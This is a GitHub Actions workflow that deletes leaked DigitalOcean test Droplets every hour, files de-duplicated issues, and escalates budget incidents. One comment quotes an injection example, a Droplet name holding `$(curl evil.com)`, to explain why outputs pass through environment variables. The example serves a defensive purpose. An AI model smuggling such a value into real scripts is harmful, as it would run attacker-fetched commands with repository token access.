Skip to content

Conformance Leak Scrubber #21

Conformance Leak Scrubber

Conformance Leak Scrubber #21

name: Conformance Leak Scrubber

# Safety net for conformance Droplets that outlived both the in-test
# t.Cleanup and the smoke job's outer always() cleanup. Each run lists
# DO resources tagged conformance-pr-* that are more than 1 hour old,
# deletes every one of them, and tallies the result. When at least one
# resource was scrubbed, the run files (or appends to) a de-duplicated
# GitHub issue through scripts/file-or-comment-leak-issue.sh.
#
# The same job also performs budget-incident de-duplication: when
# month-to-date spend is above the $25/mo cap (the recovery window
# after a soft alert in the preceding hour), or when scrub events have
# fired more than 3 times today, it files a separate de-duplicated
# issue under the conformance-budget-incident label.
#
# Triggers: an hourly cron, plus workflow_dispatch so an operator can
# run it by hand (for example after a budget calibration, to clear
# stale state). The cron keeps the standard `0 * * * *` pattern so the
# wall-clock TTL on conformance-pr-* tags lines up with the leak
# detection threshold.
on:
  schedule:
    # Minute 0 of every hour, UTC. Fires regardless of branch state.
    - cron: "0 * * * *"
  workflow_dispatch:

permissions:
  contents: read
  issues: write  # the dedup helper needs this to file/comment

# Only one scrubber at a time: overlapping cron and manual dispatches
# must not double-delete or double-file. Runs are queued, not cancelled.
concurrency:
  group: conformance-leak-scrubber
  cancel-in-progress: false
jobs:
  scrub:
    name: Hourly DO leak scrub
    runs-on: ubuntu-latest
    # Bound the run explicitly. Without this the job inherits the
    # 360-minute default, and because the workflow uses a single
    # concurrency group with cancel-in-progress disabled, one hung API
    # call would hold the group and starve the following hourly runs.
    timeout-minutes: 15
    env:
      DO_CONFORMANCE_API_TOKEN: ${{ secrets.DO_CONFORMANCE_API_TOKEN }}
      # Values are quoted so they are unambiguously strings; the shell
      # steps below read them as environment variables.
      AGE_THRESHOLD_SECONDS: "3600"  # 1 hour — matches the smoke job's expected lifetime
      BUDGET_HARD_CAP_USD: "25"  # mirrors conformance-budget-check.yml
      DAILY_SCRUB_THRESHOLD: "3"  # > 3 scrub events / day → file budget incident too
    steps:
# The checkout is needed only so later steps can run the helper script
# from the repository; nothing in this job pushes. Do not leave the
# token in the local git config while those steps process API data.
- name: Check out workflow repo
  uses: actions/checkout@v4
  with:
    persist-credentials: false
# Guard against an unprovisioned secret. The cron fires on its fixed
# schedule whether or not DO_CONFORMANCE_API_TOKEN has been set up; if
# the operator has not provisioned it yet, there is also nothing to
# scrub (the smoke gate cannot have created any resources). In that
# case the remaining steps are skipped via the `armed` output instead
# of turning curl 401 failures into hourly noise.
- name: Detect unconfigured token
  id: gate
  run: |
    set -euo pipefail
    # Assume armed, downgrade when the token is empty, and write the
    # output exactly once.
    ARMED=true
    if [[ -z "${DO_CONFORMANCE_API_TOKEN}" ]]; then
      ARMED=false
      echo "::notice title=Scrubber unarmed::DO_CONFORMANCE_API_TOKEN secret not configured; skipping hourly scrub. No conformance resources can exist without the token."
    fi
    echo "armed=${ARMED}" >> "$GITHUB_OUTPUT"
# Deletes every Droplet that carries a conformance-pr-* tag and is
# older than AGE_THRESHOLD_SECONDS.
#
# Step outputs:
#   count   - number of Droplets successfully deleted
#   failed  - number of Droplets whose DELETE call failed
#   details - one "- droplet ID (NAME, age=Ns)" line per deleted Droplet
#
# The step exits non-zero when any DELETE failed, but only after it has
# attempted every leaked Droplet and written its outputs and summary.
- name: List + delete leaked Droplets
  if: steps.gate.outputs.armed == 'true'
  id: scrub
  run: |
    set -euo pipefail
    NOW_EPOCH=$(date -u +%s)
    # List all Droplets (200 per page) and filter on the tag prefix
    # client-side with jq. The conformance account holds zero
    # baseline resources so we do not expect to paginate, but we
    # follow the next-page link defensively.
    PAGE_URL="https://api.digitalocean.com/v2/droplets?per_page=200"
    SCRUBBED=0
    FAILED=0
    DETAILS=""
    while [[ -n "${PAGE_URL}" ]]; do
      # Time-bound the call and retry transient failures so a stalled
      # connection cannot hang the hourly run.
      RESPONSE=$(curl --silent --show-error --fail \
        --max-time 60 --retry 3 \
        -H "Authorization: Bearer ${DO_CONFORMANCE_API_TOKEN}" \
        "${PAGE_URL}")
      # Run jq in a plain command substitution (not a process
      # substitution) so a malformed response aborts the step under
      # `set -e` instead of looking like "no leaked Droplets".
      CANDIDATES=$(jq -r '.droplets[]? | select(.tags // [] | any(startswith("conformance-pr-"))) | [.id, .name, .created_at] | @tsv' <<< "${RESPONSE}")
      # Iterate Droplets whose tags include any conformance-pr-*
      # entry; delete those whose created_at is past the threshold.
      while IFS=$'\t' read -r ID NAME CREATED_AT; do
        [[ -z "${ID}" ]] && continue
        # BSD date syntax first, GNU date as the fallback.
        CREATED_EPOCH=$(date -u -j -f '%Y-%m-%dT%H:%M:%SZ' "${CREATED_AT}" +%s 2>/dev/null \
          || date -u -d "${CREATED_AT}" +%s)
        AGE=$(( NOW_EPOCH - CREATED_EPOCH ))
        if [[ "${AGE}" -gt "${AGE_THRESHOLD_SECONDS}" ]]; then
          # Force-delete via DELETE /v2/droplets/{id}. A failure here
          # must not abort the loop: the remaining leaked Droplets
          # still need deleting and the outputs still need writing.
          if curl --silent --show-error --fail \
            --max-time 60 \
            -X DELETE \
            -H "Authorization: Bearer ${DO_CONFORMANCE_API_TOKEN}" \
            "https://api.digitalocean.com/v2/droplets/${ID}"; then
            SCRUBBED=$(( SCRUBBED + 1 ))
            DETAILS+="- droplet ${ID} (${NAME}, age=${AGE}s)"$'\n'
            echo "deleted droplet ${ID} (${NAME}, age=${AGE}s)"
          else
            FAILED=$(( FAILED + 1 ))
            echo "::warning title=Droplet delete failed::droplet ${ID} (${NAME}, age=${AGE}s) could not be deleted; continuing with the remaining Droplets."
          fi
        fi
      done <<< "${CANDIDATES}"
      PAGE_URL=$(jq -r '.links.pages.next // ""' <<< "${RESPONSE}")
    done
    # Multi-line output needs a delimiter. Use a random one and write
    # DETAILS verbatim (no escape expansion) so API-supplied text can
    # neither terminate the block early nor inject extra outputs.
    DELIMITER="details_$(od -An -N16 -tx1 /dev/urandom | tr -d ' \n')"
    {
      echo "count=${SCRUBBED}"
      echo "failed=${FAILED}"
      echo "details<<${DELIMITER}"
      printf '%s' "${DETAILS}"
      echo "${DELIMITER}"
    } >> "$GITHUB_OUTPUT"
    echo "scrubbed_count=${SCRUBBED}" >> "$GITHUB_STEP_SUMMARY"
    # Keep the run red when any delete failed, as a failed DELETE did
    # before, but only after every Droplet has been attempted.
    if [[ "${FAILED}" -gt 0 ]]; then
      echo "failed_count=${FAILED}" >> "$GITHUB_STEP_SUMMARY"
      echo "::error title=Leak scrub incomplete::${FAILED} leaked Droplet(s) could not be deleted; see the warnings above."
      exit 1
    fi
# The scrub outputs reach the script through `env:` instead of being
# templated into the script body. ${{ ... }} is substituted BEFORE bash
# parses the script, so a Droplet name from the DO API that contains
# shell metacharacters (e.g., `$(curl evil.com)`) would otherwise run
# on the runner with GITHUB_TOKEN access. Reading the value from an
# environment variable at runtime is the mitigation GitHub documents:
# https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable
- name: File / comment on dedup leak issue
  if: steps.gate.outputs.armed == 'true' && steps.scrub.outputs.count != '0'
  env:
    SCRUB_COUNT: ${{ steps.scrub.outputs.count }}
    SCRUB_DETAILS: ${{ steps.scrub.outputs.details }}
    PRIMARY_LABEL: conformance-leak-incident
    HELPER_LABEL: auto-filed-leak
    GH_TOKEN: ${{ github.token }}
  run: |
    # Positional arguments: scrub count, then the per-Droplet details.
    .github/workflows/scripts/file-or-comment-leak-issue.sh "${SCRUB_COUNT}" "${SCRUB_DETAILS}"
# Budget-incident gate. Two independent triggers:
#   1. Month-to-date spend > $25/mo cap (the smoke-gate kill-
#      switch already aborts new runs above this; this branch
#      ensures an audit-trail issue exists).
#   2. Scrub EVENTS today > 3 — sustained leak rate that
#      warrants human investigation regardless of dollar value.
# Files into a SEPARATE dedup chain so leak vs. budget swimlanes
# stay clean.
#
# IMPORTANT: counting "scrub events" means counting actual scrub
# runs that detected leaks, NOT counting issues created today.
# Because the dedup helper appends comments to a single open issue
# rather than filing fresh ones, an issues-created-today count caps
# at 1 even during a steady-state leak, which would silently defeat
# the > 3/day escalation. This step therefore counts the COMMENTS on
# the open dedup issue (each scrub appends one), plus 1 if the issue
# itself was filed today (first-detection-of-day case). Identified
# by spec-review of T7.14.
- name: Check balance + escalate budget incident
  if: steps.gate.outputs.armed == 'true'
  env:
    GH_TOKEN: ${{ github.token }}
  run: |
    set -euo pipefail
    # Time-bound the call and retry transient failures so a stalled
    # connection cannot hang the hourly run.
    BALANCE=$(curl --silent --show-error --fail \
      --max-time 60 --retry 3 \
      -H "Authorization: Bearer ${DO_CONFORMANCE_API_TOKEN}" \
      "https://api.digitalocean.com/v2/customers/my/balance")
    SPEND=$(jq -r '.month_to_date_usage // "0"' <<< "${BALANCE}")
    # Refuse to continue on anything that is not a plain decimal
    # number. An empty or malformed value must fail loudly rather
    # than be read as "under budget".
    NUMERIC_RE='^-?[0-9]+([.][0-9]+)?$'
    if [[ ! "${SPEND}" =~ ${NUMERIC_RE} ]]; then
      echo "::error title=Unparseable balance::month_to_date_usage is not a plain decimal number; refusing to evaluate the budget cap."
      exit 1
    fi
    # Count today's scrub events from the open dedup issue's
    # comment trail. Each scrub run that detected leaks appends
    # one comment via the dedup helper. If no open dedup issue
    # exists yet (no leaks today), the count is 0.
    TODAY="$(date -u '+%Y-%m-%d')"
    EXISTING=$(gh issue list \
      --label conformance-leak-incident \
      --label auto-filed-leak \
      --state open \
      --json number \
      --jq '.[0].number // empty')
    if [[ -n "${EXISTING}" ]]; then
      # Paginate over comments; count those created today.
      #
      # IMPORTANT: --paginate runs the --jq filter PER PAGE, so a
      # `... | length` inside --jq emits one length per page and
      # would yield a multi-line string once the issue paginates
      # (every 30 comments by default). Bash arithmetic on a
      # multi-line string fails with "syntax error in expression"
      # exactly when the scrubber is most needed. Mitigation: emit
      # one created_at line per matching comment and count the
      # lines with wc -l, which operates on the merged stream.
      COMMENTS_TODAY=$(gh api \
        "repos/${GITHUB_REPOSITORY}/issues/${EXISTING}/comments" \
        --paginate \
        --jq ".[] | select(.created_at >= \"${TODAY}T00:00:00Z\") | .created_at" \
        | wc -l \
        | tr -d ' ')
      # Include the issue creation itself if it was today
      # (covers the first-detection-of-day case where there
      # are 0 comments yet but 1 scrub event has fired).
      ISSUE_TODAY=$(gh issue view "${EXISTING}" \
        --json createdAt \
        --jq "if .createdAt >= \"${TODAY}T00:00:00Z\" then 1 else 0 end")
      TODAY_SCRUBS=$(( COMMENTS_TODAY + ISSUE_TODAY ))
    else
      TODAY_SCRUBS=0
    fi
    ESCALATE=0
    REASON=""
    # Pass both numbers as awk variables instead of splicing them
    # into the program text, so the API value is never parsed as awk
    # code. `+ 0` forces a numeric comparison.
    if awk -v spend="${SPEND}" -v cap="${BUDGET_HARD_CAP_USD}" \
      'BEGIN { exit !((spend + 0) > (cap + 0)) }'; then
      ESCALATE=1
      REASON="month-to-date \$${SPEND} > \$${BUDGET_HARD_CAP_USD} cap"
    fi
    if [[ "${TODAY_SCRUBS}" -gt "${DAILY_SCRUB_THRESHOLD}" ]]; then
      ESCALATE=1
      # Append to the spend reason when both triggers fired.
      REASON="${REASON:+${REASON}; }${TODAY_SCRUBS} scrub events today > ${DAILY_SCRUB_THRESHOLD} threshold"
    fi
    if [[ "${ESCALATE}" -eq 1 ]]; then
      # Same helper as the leak issue, pointed at the budget labels
      # so the two dedup chains stay separate.
      PRIMARY_LABEL=conformance-budget-incident \
      HELPER_LABEL=auto-filed-budget \
      ISSUE_TITLE="Conformance budget incident: ${REASON}" \
        .github/workflows/scripts/file-or-comment-leak-issue.sh \
        "${SPEND}" "${REASON}"
    else
      echo "::notice title=Budget OK::month_to_date_usage=${SPEND}; today_scrubs=${TODAY_SCRUBS}"
    fi